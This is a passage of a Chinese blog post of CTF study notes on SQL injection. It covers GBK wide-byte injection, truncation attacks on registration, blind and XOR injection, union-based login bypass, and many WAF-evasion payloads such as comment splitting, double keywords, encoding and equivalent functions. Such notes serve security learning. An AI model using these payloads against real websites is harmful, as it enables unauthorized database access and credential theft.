返回在预定义字符之前添加反斜杠的字符串</p>
<pre><code class="highlight sql"># 预定义字符
<span class="number">1.</span>单引号(<span class="string">&#x27;)</span>
<span class="string">2.双引号(&quot;)</span>
<span class="string">3.反斜杠(\)</span>
<span class="string">4.NULL</span></code></pre>
<p>上述函数常在CMS里使用进行过滤</p>
<h4 id="宽字节注入条件"><a class="markdownIt-Anchor" href="#宽字节注入条件"></a> <strong>宽字节注入条件</strong></h4>
<p>1.数据库为GBK编码<br>
2.使用了转义函数，将、POGETST、cookie传递的参数进行过滤，将单引号、双引号、null等敏感字符用转义符 \ 进行转义</p>
<h4 id="payload"><a class="markdownIt-Anchor" href="#payload"></a> payload</h4>
<pre><code class="highlight plaintext">root %df&#x27; or 1=1 #
# 原理:在GBK编码中,反斜杠的编码是%5c,在输入%df后，使得添加反斜杠后形成%df%5c，而%df%5c是繁体字“連”，单引号成功逃逸，爆出Mysql数据库的错误</code></pre>
<h3 id="约束攻击"><a class="markdownIt-Anchor" href="#约束攻击"></a> 约束攻击</h3>
<p>在SQL执行字符串处理操作时，字符串末尾的空格符将会被删除，换句话说&quot;user&quot;是等同于&quot;user     &quot;的，对于绝大多数的情况这两个相等都是成立的(像WHERE子句的字符串和INSERT语句中的字符串)</p>
<blockquote>
<p>[!WARNING]</p>
<p>但是在像LIKE 子句中这是不成立的。因为对尾部空白符的这种修剪操作，主要是在“字符串比较”期间进行的。这是因为，SQL会在<a target="_blank" rel="noopener" href="https://support.microsoft.com/en-in/kb/316626">内部</a>使用空格来填充字符串，以便在比较之前使其它们的长度保持一致</p>
</blockquote>
<p>在所有的INSERT查询中，SQL都会根据varchar(n)来限制字符串的最大长度。也就是说，如果字符串的长度大于“n”个字符的话，那么仅使用字符串的前“n”个字符。比如特定列的长度约束为“5”个字符，那么在插入字符串“vampire”时，实际上只能插入字符串的前5个字符，即“vampi”</p>
<p><strong>攻击手段</strong></p>
<p>注册一个用户名+一堆括号+1的用户名和自己的passwd(未超出长度限制的字符应该只包含已知的用户名和空白字符)</p>
<p>注:在查询时，SQL是不会将字符串截断的。因此，使用完整的字符串进行搜索，所以不会找到匹配的结果。但当执行INSERT查询语句时，它只会插入被限制长度的字符。</p>
<p>在攻击结束后，输入后来我们自己的密码和已给的用户名，会登录上原始用户</p>
<pre><code class="highlight plaintext">解决办法:
将要求或者预期具有唯一性的那些列加上UNIQUE约束。实际上这是一个涉及软件开发的重要规则，即使你的代码有维持其完整性的功能，也应该恰当的定义数据。由于’username’列具有UNIQUE约束，所以不能插入另一条记录。将会检测到两个相同的字符串，并且INSERT查询将失败。

最好使用’id’作为数据库表的主键。并且数据应该通过程序中的id进行跟踪

为了更加安全，还可以用手动调整输入参数的限制长度（依照数据库设置）</code></pre>
<h3 id="order-by注入"><a class="markdownIt-Anchor" href="#order-by注入"></a> Order by注入</h3>
<h3 id="异或注入"><a class="markdownIt-Anchor" href="#异或注入"></a> 异或注入</h3>
<p>一般和盲注一起从出现，原因是大部分基础的查询已经被ban了(悲)</p>
<p>这里涉及到一个知识点，即Mysql的隐式转换，其实和PHP比较相像吧</p>
<pre><code class="highlight plaintext">Mysql的隐式转换
当字符串和数字进行算术计算时，字符串会被尝试转化为数字(如果可能)
例如&#x27;1&#x27;+1 会被解释为1+1
若不能成功转化(即字符串的首位不为数字),字符串就会被解释为0</code></pre>
<p>所以我们就可以通过异或式来辅助盲注(判断bool盲注的语句返回结果是否为真,帮助加长时间盲注的运算时间)</p>
<h2 id="episode-3-在拿到flag的边缘疯狂试探盲注"><a class="markdownIt-Anchor" href="#episode-3-在拿到flag的边缘疯狂试探盲注"></a> Episode 3 在拿到flag的边缘疯狂试探:盲注</h2>
<p>(哈哈，盲注脚本吗，你问我，我只能说最好自己写一个，网上淘来的毕竟是别人的不如你自己搓的顺手)</p>
<p>先确定注入型，再用and连接一下</p>
<pre><code class="highlight sql">布尔盲注
<span class="number">1.</span> length(database())<span class="operator">&gt;</span>??? 初步判断
<span class="number">2.</span></code></pre>
<h2 id="episode-4-注入点猜猜我在哪里呢"><a class="markdownIt-Anchor" href="#episode-4-注入点猜猜我在哪里呢"></a> Episode 4 注入点:&gt;猜猜我在哪里呢</h2>
<h3 id="post注入"><a class="markdownIt-Anchor" href="#post注入"></a> POST注入</h3>
<h3 id="get注入"><a class="markdownIt-Anchor" href="#get注入"></a> GET注入</h3>
<h3 id="cookies注入"><a class="markdownIt-Anchor" href="#cookies注入"></a> Cookies注入</h3>
<h2 id="episode-5-你好绕waf"><a class="markdownIt-Anchor" href="#episode-5-你好绕waf"></a> Episode   5  你好，绕WAF</h2>
<h3 id="大小写绕过"><a class="markdownIt-Anchor" href="#大小写绕过"></a> 大小写绕过</h3>
<p>如过过滤了and和AND，试试And</p>
<h3 id="双写绕过"><a class="markdownIt-Anchor" href="#双写绕过"></a> 双写绕过</h3>
<p>如果waf把and替换为空</p>
<p>然后可以使用<code>anandd</code>绕过</p>
<h3 id="空格过滤绕过"><a class="markdownIt-Anchor" href="#空格过滤绕过"></a> 空格过滤绕过</h3>
<p>/**/  注释符号</p>
<pre><code class="highlight plaintext">()-&gt;select(1),2,3</code></pre>
<p>（）可以作为一个子语句查询存在,任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。所以就可以用()代替空格</p>
<p>url编码绕过<code>%0a %20 %09 %0a %0b %0c %0d %a0</code>代替。</p>
<h3 id="引号绕过"><a class="markdownIt-Anchor" href="#引号绕过"></a> 引号绕过</h3>
<p>使用十六进制替代需要用到引号的语句，一般是在最后的查询语句</p>
<h3 id="and和or绕过"><a class="markdownIt-Anchor" href="#and和or绕过"></a> and和or绕过</h3>
<p>考虑管道符||表示or和&amp;&amp;表示and</p>
<h3 id="绕过"><a class="markdownIt-Anchor" href="#绕过"></a> =绕过</h3>
<p>改成like或者&lt;或者&gt;</p>
<p>还有<code>rlike 、regexp(正则匹配函数，‘’是直接找或包含，^是以什么开头,可以用[a-zA-Z]流氓匹配)</code></p>
<ul>
<li>这里详细将一下正则的注入吧，感觉和正则沾上关系的都蛮不当人的</li>
</ul>
<p>正常的一个查询语句就像这样:</p>
<pre><code class="highlight sql"><span class="keyword">select</span> password <span class="keyword">from</span> users <span class="keyword">where</span> id <span class="operator">=</span><span class="number">1</span></code></pre>
<p>这里引用其他师傅打好的实例(<a target="_blank" rel="noopener" href="https://ljdd520.github.io/2019/11/06/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%9F%A5%E8%AF%86%E6%80%BB%E7%BB%93/">sql注入的知识总结 | L’s Blog</a>)</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250402210544627.png" alt="image-20250402210544627"></p>
<p>呃呃，怎么理解呢?就把regexp看成从^开始字符串与查询到的原串进行一个比较</p>
<h3 id="逗号过滤"><a class="markdownIt-Anchor" href="#逗号过滤"></a> 逗号过滤</h3>
<pre><code class="highlight sql"><span class="keyword">select</span> substr(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);
#substr(str,pos,len)的功能是从pos开始的位置，截取len个字符；而无len就是直接截取到最后
<span class="keyword">select</span> mid(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);
#
<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span><span class="operator">-</span><span class="operator">&gt;</span> <span class="operator">&lt;</span><span class="keyword">select</span> <span class="number">1</span><span class="operator">&gt;</span>a <span class="keyword">join</span> <span class="operator">&lt;</span><span class="keyword">select</span> <span class="number">2</span><span class="operator">&gt;</span>b <span class="keyword">join</span><span class="operator">&lt;</span><span class="keyword">select</span> <span class="number">3</span><span class="operator">&gt;</span>c <span class="keyword">join</span>
<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span><span class="operator">-</span><span class="operator">&gt;</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ((selcet1)A <span class="keyword">join</span> (select2)B <span class="keyword">join</span>(<span class="keyword">select</span> <span class="number">3</span>)C);
limit <span class="number">0</span>,<span class="number">1</span><span class="operator">-</span><span class="operator">&gt;</span>limit <span class="number">1</span> <span class="keyword">offset</span> <span class="number">0</span>;<span class="operator">/</span><span class="operator">/</span>等于limit <span class="number">0</span>,<span class="number">1</span> 从第<span class="number">1</span>行往后取<span class="number">0</span>行，只读第一行
#limit <span class="number">1</span>,<span class="number">2</span> 指的是从第一行往后取<span class="number">2</span>行（包括第一行和第二行)；而limit <span class="number">1</span> <span class="keyword">offset</span> <span class="number">2</span>是从第一行开始只取第二行
<span class="keyword">select</span> <span class="built_in">substring</span>(<span class="string">&#x27;hello&#x27;</span> <span class="keyword">from</span> <span class="number">1</span>);</code></pre>
<h3 id="比较符号-绕过"><a class="markdownIt-Anchor" href="#比较符号-绕过"></a> 比较符号(&lt; &gt;)绕过</h3>
<p>一般是盲注要用到捏</p>
<p>最常见的一个盲注的sql语句：</p>
<pre><code class="highlight plaintext">select * from users where id=1 and ascii(substr(database(),0,1))&gt;64</code></pre>
<p>此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。</p>
<p>那么上面的这条sql语句可以使用greatest变为如下的子句:</p>
<pre><code class="highlight plaintext">select*fromuserswhereid=1and greatest(ascii(substr(database(),0,1)),64)=64</code></pre>
<h3 id="绕过关键字unionselectwhere"><a class="markdownIt-Anchor" href="#绕过关键字unionselectwhere"></a> 绕过关键字(union,select，where)</h3>
<p>1）使用注释符绕过：</p>
<p>常用注释符：</p>
<p><code>//，-- , /**/, #(url编码一下还能用), --+, -- -, ;,%00,--a</code></p>
<p>用法：</p>
<p><code>U/**/NION/**/SE/**/LECT/**/user，pwd from user</code></p>
<p>2）使用大小写绕过：</p>
<p><code>id=-1'UnIoN/**/SeLeCT</code></p>
<p>3）内联注释绕过：</p>
<p><code>id=-1'/*!UnIoN*/SeLeCT1,2,concat(/*!table_name*/) FrOM/*information_schema*/.tables/*!WHERE*//*!TaBlE_ScHeMa*/like database()#</code></p>
<p>4） 双关键字绕过：</p>
<p><code>id=-1'UNIunionONSeLselectECT1,2,3–-</code></p>
<h3 id="通用编码绕过"><a class="markdownIt-Anchor" href="#通用编码绕过"></a> 通用编码绕过</h3>
<p>如URLEncode编码，ASCII,HEX,unicode编码绕过：</p>
<p>or1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)</p>
<h3 id="等价函数绕过"><a class="markdownIt-Anchor" href="#等价函数绕过"></a> 等价函数绕过</h3>
<p>hex()、bin()==&gt;ascii()</p>
<p>sleep()==&gt;benchmark()</p>
<p>concat_ws()==&gt;group_concat()</p>
<p>mid()、substr()<mark>&gt;substring() @@user</mark>&gt;user() @@datadir==&gt;datadir()</p>
<p>举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74或者：</p>
<p>substr((select’password’),1,1)=0x70strcmp(left(‘password’,1),0x69)=1strcmp(left(‘password’,1),0x70)=0strcmp(left(‘password’,1),0x71)=-1</p>
<h3 id="长度限制绕过"><a class="markdownIt-Anchor" href="#长度限制绕过"></a> 长度限制绕过</h3>
<p>网页显示常常只能给出有限长度的字母，这个时候就要通过一些函数来绕过</p>
<pre><code class="highlight sql"><span class="number">1</span>、<span class="keyword">left</span>（<span class="number">201809</span>,<span class="number">4</span>）截取左边的<span class="number">4</span>个字符
<span class="keyword">SELECT</span> <span class="keyword">LEFT</span>(<span class="number">201809</span>,<span class="number">4</span>)    <span class="operator">/</span><span class="operator">/</span>结果：<span class="number">2018</span>

<span class="number">2</span>、<span class="keyword">right</span>（name,<span class="number">2</span>）截取右边的<span class="number">2</span>个字符
<span class="keyword">SELECT</span> <span class="keyword">RIGHT</span>(<span class="number">201809</span>,<span class="number">2</span>)    <span class="operator">/</span><span class="operator">/</span>结果：<span class="number">09</span>

<span class="number">3</span>、<span class="built_in">SUBSTRING</span>(name,<span class="number">5</span>,<span class="number">3</span>) 截取name这个字段 从第五个字符开始 只截取之后的<span class="number">3</span>个字符
<span class="keyword">SELECT</span> <span class="built_in">SUBSTRING</span>(<span class="string">&#x27;成都融资事业部&#x27;</span>,<span class="number">5</span>,<span class="number">3</span>)   <span class="operator">/</span><span class="operator">/</span>结果：事业部

<span class="number">4</span>、<span class="built_in">SUBSTRING</span>(name,<span class="number">3</span>) 截取name这个字段 从第三个字符开始，之后的所有个字符
<span class="keyword">SELECT</span> <span class="built_in">SUBSTRING</span>(<span class="string">&#x27;成都融资事业部&#x27;</span>,<span class="number">3</span>)   <span class="operator">/</span><span class="operator">/</span>结果：融资事业部

<span class="number">5</span>、<span class="built_in">SUBSTRING</span>(name, <span class="number">-4</span>) 截取name这个字段的第 <span class="number">4</span> 个字符位置（倒数）开始取，直到结束
<span class="keyword">SELECT</span> <span class="built_in">SUBSTRING</span>(<span class="string">&#x27;成都融资事业部&#x27;</span>,<span class="number">-4</span>)   <span class="operator">/</span><span class="operator">/</span>结果：资事业部

<span class="number">6</span>、<span class="built_in">SUBSTRING</span>(name, <span class="number">-4</span>，<span class="number">2</span>) 截取name这个字段的第 <span class="number">4</span> 个字符位置（倒数）开始取，只截取之后的<span class="number">2</span>个字符
<span class="keyword">SELECT</span> <span class="built_in">SUBSTRING</span>(<span class="string">&#x27;成都融资事业部&#x27;</span>,<span class="number">-4</span>,<span class="number">2</span>)   <span class="operator">/</span><span class="operator">/</span>结果：资事
注意：我们注意到在函数 <span class="built_in">substring</span>(str,pos, len)中， pos 可以是负值，但 len 不能取负值。

<span class="number">7</span>、substring_index(<span class="string">&#x27;www.baidu.com&#x27;</span>, <span class="string">&#x27;.&#x27;</span>, <span class="number">2</span>) 截取第二个 <span class="string">&#x27;.&#x27;</span> 之前的所有字符
<span class="keyword">SELECT</span> substring_index(<span class="string">&#x27;www.baidu.com&#x27;</span>, <span class="string">&#x27;.&#x27;</span>, <span class="number">2</span>)   <span class="operator">/</span><span class="operator">/</span>结果：www.baidu

<span class="number">8</span>、substring_index(<span class="string">&#x27;www.baidu.com&#x27;</span>, <span class="string">&#x27;.&#x27;</span>, <span class="number">-2</span>) 截取第二个 <span class="string">&#x27;.&#x27;</span> （倒数）之后的所有字符
<span class="keyword">SELECT</span> substring_index(<span class="string">&#x27;www.baidu.com&#x27;</span>, <span class="string">&#x27;.&#x27;</span>, <span class="number">-2</span>)   <span class="operator">/</span><span class="operator">/</span>结果：baidu.com

<span class="number">9</span>、SUBSTR(name, <span class="number">1</span>, <span class="keyword">CHAR_LENGTH</span>(name)<span class="number">-3</span>) 截取name字段，取除name字段后三位的所有字符
<span class="keyword">SELECT</span> SUBSTR(<span class="string">&#x27;成都融资事业部&#x27;</span>, <span class="number">1</span>, <span class="keyword">CHAR_LENGTH</span>(<span class="string">&#x27;成都融资事业部&#x27;</span>)<span class="number">-3</span>)            <span class="operator">/</span><span class="operator">/</span>结果：成都融资

<span class="number">10</span>、mid(str,<span class="keyword">start</span>,[length])
str:截取的字符串   <span class="keyword">start</span>:起始位置   length:截取的长度，可以忽略
还可以这么构造:mid((str)<span class="keyword">from</span>(i)<span class="keyword">for</span>(<span class="number">1</span>)) #<span class="keyword">from</span>(<span class="number">1</span>)表示从第一个位置开始截取剩下的字符串，<span class="keyword">for</span>(<span class="number">1</span>)表示从改位置起一次就截取一个字符

<span class="number">11.</span>reverse(concat(<span class="number">0x3a</span>，(<span class="keyword">select</span>(group_concat(real_flag_1s_here))<span class="keyword">from</span>(users)<span class="keyword">where</span>(real_flag_1s_here)regexp(<span class="string">&#x27;^f&#x27;</span>))))
用reverse倒序输出，有时候有奇效。?大概吧
</code></pre>
<h2 id="episode-6-模糊匹配"><a class="markdownIt-Anchor" href="#episode-6-模糊匹配"></a> Episode 6  模糊匹配</h2>
<p>SQL模糊查询，使用like比较关键字，加上SQL里的通配符，请参考以下：</p>
<p>1、LIKE’Mc%’ 将搜索以字母 Mc 开头的所有字符串（如 McBadden）。</p>
<p>2、LIKE’%inger’ 将搜索以字母 inger 结尾的所有字符串（如 Ringer、Stringer）</p>
<p>3、LIKE’%en%’ 将搜索在任何位置包含字母 en 的所有字符串（如 Bennet、Green、McBadden）。</p>
<p>4、LIKE’_heryl’ 将搜索以字母 heryl 结尾的所有六个字母的名称（如 Cheryl、Sheryl）。</p>
<p>5、LIKE’[CK]ars[eo]n’ 将搜索下列字符串：Carsen、Karsen、Carson 和 Karson（如 Carson）。</p>
<p>6、LIKE’[M-Z]inger’ 将搜索以字符串 inger 结尾、以从 M 到 Z 的任何单个字母开头的所有名称（如 Ringer）。</p>
<p>7、LIKE’M[^c]%’ 将搜索以字母 M 开头，并且第二个字母不是 c 的所有名称（如MacFeather）。</p>
<h2 id="episode-7-奇奇怪怪的知识点和一些技巧积累"><a class="markdownIt-Anchor" href="#episode-7-奇奇怪怪的知识点和一些技巧积累"></a> Episode   7 奇奇怪怪的知识点和一些技巧积累</h2>
<h3 id="短路算法"><a class="markdownIt-Anchor" href="#短路算法"></a> <strong>短路算法：</strong></h3>
<p>|| 逻辑或的短路：a||b</p>
<p>计算机发现a是真，那么输出a；如果a是假，那么输出b</p>
<p>select 1 from ：建立一个临时列，这个列的所有初始值都被设为1。如果发现select后面跟有||就可以构造1 ||(sql语句) 用来无效化后方语句。</p>
<h3 id="with-rollup来自ctfshow-web10"><a class="markdownIt-Anchor" href="#with-rollup来自ctfshow-web10"></a> <strong>WITH ROLLUP:</strong>(来自ctfshow web10)</h3>
<pre><code class="highlight plaintext">语法:group by xxx with rollup</code></pre>
<p>with rollup是对前面数据的一次汇总，此时在查询的数据中会被插入一行值为NULL,此时即可绕过长度检验，前提你要知道在哪个表并且没有对第二个字段是否输入的前端检查</p>
<h3 id="联合查询伪造"><a class="markdownIt-Anchor" href="#联合查询伪造"></a> <strong>联合查询伪造</strong></h3>
<p>通过联合查询，你可以伪造一段没有的数据(即临时数据)</p>
<p>因为union select会把查询结果接在前一个查询结果后面，前面如果查到了东西，那么取得还是第一行</p>
<p>那么通过让前面查不到，回显我们的注入语句就能够达到注入目的(呃呃，感觉有点像二次注入的后面半段)</p>
<p>这里直接应用别的师傅打好的案例</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250330124245041.png" alt="image-20250330124245041"></p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250330124258559.png" alt="image-20250330124258559"></p>
<p>那么只要知道username所在的列就可以直接糊弄过密码的检测了</p>
<h3 id="注释和非注释闭合"><a class="markdownIt-Anchor" href="#注释和非注释闭合"></a> 注释和非注释闭合</h3>
<p>众所周知，<code># --+</code>是为了注释掉后面的’</p>
<p>那我问你，如果注释符全被过滤了呢</p>
<p>诶，那就用到非注释闭合，就是在payload最后把–+这些换成and ‘1’='1</p>
<p>来达到正常注入不报错的目的</p>
<h2 id="episode-8-一点感想"><a class="markdownIt-Anchor" href="#episode-8-一点感想"></a> Episode   8 一点感想</h2>
<p>刷了一些题目，发现最重要的其实是注入点的判断(除非是万恶的盲注，那重点可能更在脚本上)</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.jpg" alt="AyaN0 微信">
        <span>微信</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/web-CTF/" rel="tag"># -web -CTF</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/03/09/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="prev" title="PHP反序列化">
                  <i class="fa fa-angle-left"></i> PHP反序列化
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/03/15/%E8%AF%A6%E8%A7%A3XSS%E6%B3%A8%E5%85%A5/" rel="next" title="详解XSS注入">
                  详解XSS注入 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">AyaN0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">329k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">9:59</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
